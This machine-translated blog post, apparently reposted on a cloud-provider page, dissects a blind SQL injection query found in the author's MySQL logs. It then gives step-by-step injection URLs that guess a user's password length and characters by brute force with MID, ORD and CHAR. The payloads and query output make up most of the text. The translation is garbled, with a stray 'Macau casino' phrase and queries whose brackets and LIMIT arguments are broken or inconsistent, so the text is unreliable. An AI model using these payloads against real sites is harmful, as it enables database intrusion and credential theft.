Some days ago the database was invaded, the reading of the article has been modified, fortunately, timely discovery and good backup. Check the MySQL statement record, and found that this is the original sentence SQL in mischief:
UPDATE table SET views = ' 1 ' WHERE id = -2441 OR (ORD ((SELECT ifnull (FirstName as CHAR), 0x20) from the user ORDER by ID LIMIT, 2,1)) >112) #
Ps:user This table is a previously tested table in the database, and the structure of the table is also written in the blog post, exposing the fields.
Why is this SQL so powerful? Let's analyze it next.
1. The first is the CAST (FirstName as CHAR) clause. The CAST () function of MySQL can be used to get a value of one type and produce a value of another type. Use this article to see the usage of the MySQL cast and convert functions. Let's take a look at what the result is:
Mysql> SELECT CAST (FirstName as CHAR) from user;+-------------------------+| CAST (FirstName as CHAR) |+-------------------------+| Gonn | | Mio | | Google | | Yale |+-------------------------+4 rows in Set
is to turn the FirstName field all the way to CHAR type.
2. Next we look at Ifnull (CAST (FirstName as CHAR), 0x20) The effect of this clause. Ifnull usage: ifnull (EXPR1,EXPR2), if EXPR1 is not Null,ifnull () returns EXPR1, otherwise it returns EXPR2. Refer to the MySQL ifnull () function usage for details.
Execute:
Mysql> SELECT ifnull (CAST (FirstName as CHAR), 0x20) from user;+--------------------------------------+| Ifnull (CAST (FirstName as CHAR), 0x20) |+--------------------------------------+| Gonn | | Mio | | Google | | Yale |+--------------------------------------+4 rows in Set
Although it seems that the results are not different, but it has played a role. Assuming that the Macau casino has failed to convert the cast to CHAR, it will return the value of 0x20, for the latter to provide the role of ORD.
3. Next Look at MID ((SELECT ifnull (CAST (FirstName as CHAR), 0x20) from the user ORDER by ID LIMIT, 2, 1) this clause. MID () This function is used to intercept strings, in particular, you can see the "MySQL MID () function usage" this.
Mysql> Select MID ((Select Ifnull (CAST (FirstName as CHAR), 0x20) from the user ORDER by ID LIMIT), 2,1); +----------------- -----------------------------------------------------------------------+| MID ((SELECT ifnull (CAST (FirstName as CHAR), 0x20) from the user ORDER by ID LIMIT, 2,1) |+-------------------------------- --------------------------------------------------------+| I |+----------------------------------------------------------------------------------------+1 row in Set
You get a letter i.
4. The key clauses come: ORD ((SELECT ifnull (CAST (FirstName as CHAR), 0x20) from user ORDER by ID LIMIT, 2, 1)). The ORD () function returns the ASCII value of the first character of a string, "MySQL ORD () function usage".
Mysql> Select ORD (MID ((Select Ifnull (CAST (FirstName as CHAR), 0x20) from the user ORDER by ID LIMIT), 2,1)); +------------ ---------------------------------------------------------------------------------+| ORD (MID ((SELECT ifnull (CAST (FirstName as CHAR), 0x20) from the user ORDER by ID LIMIT, 2,1)) |+--------------------------- ------------------------------------------------------------------+| |+---------------------------------------------------------------------------------------------+1 Row in Set
The ASCII code for I is 105.
If it is a failure, return 0x20 this situation:
mysql> SELECT ORD (' 0x20 '); +-------------+| ORD (' 0x20 ') |+-------------+| |+-------------+1 Row in SetIn both cases, the ASCII code is more than 112, the following hack statement can be executed.
MySQL Guess injectionUPDATE table SET views = ' 1 ' WHERE id = -2441 OR (ORD ((SELECT ifnull (FirstName as CHAR), 0x20) from Nowamagic. ' TB2 ' ORDER by ID LIMIT, 2,1) ' >112) #
There are many functions built into MySQL that can be used to do unexpected things even in older versions of MySQL that do not have a federated query feature. Assuming that the site exists in http://www.nm.net/, and we want to know the user ID equals 10 of the user's password, then first make the following request:
http://www.nm.net/index.php?id=10 and Length (password) =12#
We can determine the length of the user's password by passing the length () function and correctly returning to the normal page, here we guess 12 bits, note that there is a # number after the number. Next use the mid () and char () violence to guess each character of the password, and if you guessed it, the page returns to normal:
Http://www.nm.net/index.php?id=10 and Mid (password,1,1) =char (0x60) #
The mid () function prototype is "MID (Str,pos,len)" or you can use the substring () function. The arguments to the Char () function are ASCII values, and in between 0~255, a traversal of the past can be done.
In addition, you can use the between () function to determine whether the character is a number or a letter, narrowing the range, speeding up the speed of brute force. For example, to determine if a character is a lowercase letter, you can also request the following:
Http://www.nm.net/index.php?id=10 and (Mid (password,1,1)) between char (0x61) and char (0x7A) #
In addition to the char () function, you can also use the ORD function to guess the solution. The ORD function can get the ASCII value of a character, so it can do similar functions:
Http://www.nm.net/index.php?id=10 and Ord (Mid (password,1,1)) =0x6d#
Another benefit of using the ORD function is that you can use a greater than or less operator to determine the range of characters:
Http://www.nm.net/index.php?id=10 and Ord (Mid (password,1,1)) >0x41#
So slowly step-by-step manual guess injection.
MySQL Advanced hack intrusion
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
